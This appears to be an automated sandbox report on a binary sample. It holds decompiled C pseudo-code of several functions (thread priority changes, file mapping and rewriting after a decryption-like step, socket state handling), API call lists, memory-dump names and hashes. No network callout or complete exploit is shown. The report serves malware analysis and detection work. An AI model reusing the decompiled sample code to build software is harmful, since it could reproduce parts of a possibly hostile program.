                                                                                                                                                                                                                                                                  0x0040ba82
                                                                                                                                                                                                                                                                  0x0040ba58
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba8e
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040baad
                                                                                                                                                                                                                                                                  0x0040babc
                                                                                                                                                                                                                                                                  0x0040babe
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baaf
                                                                                                                                                                                                                                                                  0x0040bab2
                                                                                                                                                                                                                                                                  0x0040bab5
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baba
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040bac9
                                                                                                                                                                                                                                                                  0x0040bad4
                                                                                                                                                                                                                                                                  0x0040bae0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9B6
                                                                                                                                                                                                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9BD
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9C8
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9CF
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040B9F2
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BA27
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BA72
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BA8E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040BABE
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040BACD
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF), ref: 0040BAD4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                  • Opcode ID: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction ID: 60dba0ed44522af60a36c0c27669d54f94d2e7ae5eee10216e3926d5ce6a7601
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23410AB4A00209EBDB14CFA4C948BAEBB75EF44315F10817AE911B7781D7389A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409A60() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				DWORD* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				void* _t74;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                  					E00409750( *((intOrPtr*)(0x4123b8 + _v12 * 4)), E0040BB80(), 0);
                                                                                                                                                                                                                                                                  					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = CreateFileW(0x4137a0, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 != 0) {
                                                                                                                                                                                                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v20 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_v32 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                  								E00409750( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BB80() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                  								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                  								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					CloseHandle(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E00409470();
                                                                                                                                                                                                                                                                  				return E0040B8C0( *0x4139c8, 0, E00409340, 0, 0, 0);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00409a6b
                                                                                                                                                                                                                                                                  0x00409a71
                                                                                                                                                                                                                                                                  0x00409a83
                                                                                                                                                                                                                                                                  0x00409a9f
                                                                                                                                                                                                                                                                  0x00409aa4
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409ac3
                                                                                                                                                                                                                                                                  0x00409aca
                                                                                                                                                                                                                                                                  0x00409ae4
                                                                                                                                                                                                                                                                  0x00409aeb
                                                                                                                                                                                                                                                                  0x00409b03
                                                                                                                                                                                                                                                                  0x00409b0a
                                                                                                                                                                                                                                                                  0x00409b18
                                                                                                                                                                                                                                                                  0x00409b1b
                                                                                                                                                                                                                                                                  0x00409b22
                                                                                                                                                                                                                                                                  0x00409b3d
                                                                                                                                                                                                                                                                  0x00409b6a
                                                                                                                                                                                                                                                                  0x00409b6f
                                                                                                                                                                                                                                                                  0x00409b31
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b92
                                                                                                                                                                                                                                                                  0x00409bb5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(004139AC,?,?,?,?,?,?,0040627D), ref: 00409A6B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(004137A0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409ABD
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409ADE
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409AFD
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409B12
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00409B78
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409B82
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409B8C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                  • String ID: }b@
                                                                                                                                                                                                                                                                  • API String ID: 439099756-2189388452
                                                                                                                                                                                                                                                                  • Opcode ID: 0587c9255b2073be9bfe5c4dab8d6581e761a33ab3f578c66cae7c8798824dce
                                                                                                                                                                                                                                                                  • Instruction ID: 05997d6a355e4161d2a20ee8ba5da767b4ee5e7179cc67c9ae833650239d72a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0587c9255b2073be9bfe5c4dab8d6581e761a33ab3f578c66cae7c8798824dce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1414F74E40208EBDB10DFE4DD4AFAEB770BB44715F208169E611BB2C2C6B86945CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                                                                                  			E0040CEF0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				DWORD* _v20;
                                                                                                                                                                                                                                                                  				char _v21;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				DWORD* _t70;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v21 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							_v21 = 1;
                                                                                                                                                                                                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                                                                                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return _v21;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v28 == 0) {
                                                                                                                                                                                                                                                                  					L11:
                                                                                                                                                                                                                                                                  					CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					goto L12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                                                                                                                                  					L10:
                                                                                                                                                                                                                                                                  					CloseHandle(_v28);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                  					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                  						_t70 = E0040AF00(_v32, _v32);
                                                                                                                                                                                                                                                                  						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  						_v20 = _t70;
                                                                                                                                                                                                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                  							_v12 = _v20[6];
                                                                                                                                                                                                                                                                  							_t73 = E0040A8A0(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                                                                                                                                                                                                  							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                  							_v8 = _t73;
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								E004091E0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                  								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                  								asm("repe cmpsd");
                                                                                                                                                                                                                                                                  								if(0 != 0) {
                                                                                                                                                                                                                                                                  									E00408990(_v8);
                                                                                                                                                                                                                                                                  									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  									_v8 = 0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v32);
                                                                                                                                                                                                                                                                  					goto L10;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}














                                                                                                                                                                                                                                                                  0x0040cef8
                                                                                                                                                                                                                                                                  0x0040cefc
                                                                                                                                                                                                                                                                  0x0040cf03
                                                                                                                                                                                                                                                                  0x0040cf0a
                                                                                                                                                                                                                                                                  0x0040cf2a
                                                                                                                                                                                                                                                                  0x0040cf31
                                                                                                                                                                                                                                                                  0x0040d043
                                                                                                                                                                                                                                                                  0x0040d047
                                                                                                                                                                                                                                                                  0x0040d062
                                                                                                                                                                                                                                                                  0x0040d069
                                                                                                                                                                                                                                                                  0x0040d06b
                                                                                                                                                                                                                                                                  0x0040d081
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d095
                                                                                                                                                                                                                                                                  0x0040d09a
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040cf4b
                                                                                                                                                                                                                                                                  0x0040cf52
                                                                                                                                                                                                                                                                  0x0040d039
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x0040cf6a
                                                                                                                                                                                                                                                                  0x0040cf71
                                                                                                                                                                                                                                                                  0x0040d02f
                                                                                                                                                                                                                                                                  0x0040d033
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cf77
                                                                                                                                                                                                                                                                  0x0040cf83
                                                                                                                                                                                                                                                                  0x0040cf8d
                                                                                                                                                                                                                                                                  0x0040cf97
                                                                                                                                                                                                                                                                  0x0040cf9c
                                                                                                                                                                                                                                                                  0x0040cf9f
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040cfbf
                                                                                                                                                                                                                                                                  0x0040cfd9
                                                                                                                                                                                                                                                                  0x0040cfde
                                                                                                                                                                                                                                                                  0x0040cfe1
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cff6
                                                                                                                                                                                                                                                                  0x0040cffb
                                                                                                                                                                                                                                                                  0x0040d00e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040d016
                                                                                                                                                                                                                                                                  0x0040d01b
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040d029
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d029

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D029
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D033
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D03D
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D05C
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D081
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D08B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 171974401-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89653246819a8efb5379b0b23a728ec50d444909ce18eb7c69d008aa292c201d
                                                                                                                                                                                                                                                                  • Instruction ID: 0e99ab12e2f06471f33da5b613d817b3e723ed7e49a2bb816a75a8e19955daac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89653246819a8efb5379b0b23a728ec50d444909ce18eb7c69d008aa292c201d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215170B5E00208EBDB10DFE4DC49BAFB774AB48304F108569E614BB2C0D7786A45CB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040E560(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t108;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = __eax;
                                                                                                                                                                                                                                                                  				_t106 = __ecx;
                                                                                                                                                                                                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					_a4 = 1;
                                                                                                                                                                                                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  					_a6 = 0;
                                                                                                                                                                                                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  					return _t59;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InterlockedExchange(_t106 + 4, E0040BB80());
                                                                                                                                                                                                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                  				if(_t64 == 0) {
                                                                                                                                                                                                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                  							return E0040DF40(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                  							_push(_t106);
                                                                                                                                                                                                                                                                  							return E0040E2E0(_t108);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                  					if(_t73 != 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return _t73;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                  							_v4 = __ebx;
                                                                                                                                                                                                                                                                  							E0040DF40(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  							_t73 = E0040E4F0(_t106);
                                                                                                                                                                                                                                                                  							if(_t73 != 0) {
                                                                                                                                                                                                                                                                  								goto L14;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  								return _t73;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x0040e56a
                                                                                                                                                                                                                                                                  0x0040e56c
                                                                                                                                                                                                                                                                  0x0040e56e
                                                                                                                                                                                                                                                                  0x0040e6f6
                                                                                                                                                                                                                                                                  0x0040e70d
                                                                                                                                                                                                                                                                  0x0040e712
                                                                                                                                                                                                                                                                  0x0040e720
                                                                                                                                                                                                                                                                  0x0040e727
                                                                                                                                                                                                                                                                  0x0040e72c
                                                                                                                                                                                                                                                                  0x0040e739
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x0040e586
                                                                                                                                                                                                                                                                  0x0040e58f
                                                                                                                                                                                                                                                                  0x0040e592
                                                                                                                                                                                                                                                                  0x0040e655
                                                                                                                                                                                                                                                                  0x0040e667
                                                                                                                                                                                                                                                                  0x0040e670
                                                                                                                                                                                                                                                                  0x0040e68b
                                                                                                                                                                                                                                                                  0x0040e6a3
                                                                                                                                                                                                                                                                  0x0040e6ad
                                                                                                                                                                                                                                                                  0x0040e6b4
                                                                                                                                                                                                                                                                  0x0040e6b8
                                                                                                                                                                                                                                                                  0x0040e6c2
                                                                                                                                                                                                                                                                  0x0040e6d1
                                                                                                                                                                                                                                                                  0x0040e6e0
                                                                                                                                                                                                                                                                  0x0040e6f1
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e675
                                                                                                                                                                                                                                                                  0x0040e678
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e657
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e59b
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e5a1
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e5c3
